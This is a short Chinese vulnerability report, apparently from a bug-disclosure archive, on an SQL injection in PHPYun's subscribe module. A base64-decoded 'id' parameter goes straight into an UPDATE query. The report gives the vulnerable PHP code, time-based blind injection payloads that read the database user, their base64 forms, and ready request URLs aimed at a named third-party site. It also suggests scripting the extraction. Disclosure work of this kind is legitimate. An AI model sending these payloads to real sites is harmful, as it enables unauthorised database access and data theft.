### 简要描述:
无需登录。 最新版本。 demo测试。
功能越多 bug越多 bug越多 rank越多。
### 详细说明:
在model/subscribe.class.php中
```
function cert_action()
{
if($_GET['id'])
{
$arr=@explode("|",base64_decode($_GET['id']));//当时我就震惊了。。。
$email = $arr[0];
$code = $arr[1];
$nid=$this->obj->DB_update_all("subscribe","`status`='1'","`email`='".$email."' and `code`='".$code."'");
header("location:".$this->config['sy_weburl']."/index.php?m=register&c=ok&type=4");
}
```
- - 以前的phpyun 哪会有这么蛋疼的漏洞。 因为解码 所以编码后 无视全局的过滤。
' or if(ascii(substr((select user()),1,1))=114,sleep(3),0)#
JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNCxzbGVlcCgzKSwwKSM=
' or if(ascii(substr((select user()),1,1))=115,sleep(3),0)#
JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNSxzbGVlcCgzKSwwKSM=
分别去请求一下
http://www.hr135.com//index.php?m=subscribe&c=cert&id=JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNCxzbGVlcCgzKSwwKSM=
http://www.hr135.com//index.php?m=subscribe&c=cert&id=JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNSxzbGVlcCgzKSwwKSM=
可以发现响应时间不同。 说明第一位是114 对应的就是r啦 可以写个脚本直接跑。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201412/24191256098812e294891cbc5a29aefe921728c0.jpg" alt="p12.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24191256098812e294891cbc5a29aefe921728c0.jpg)
京公网安备 11010502034610号
暂无评论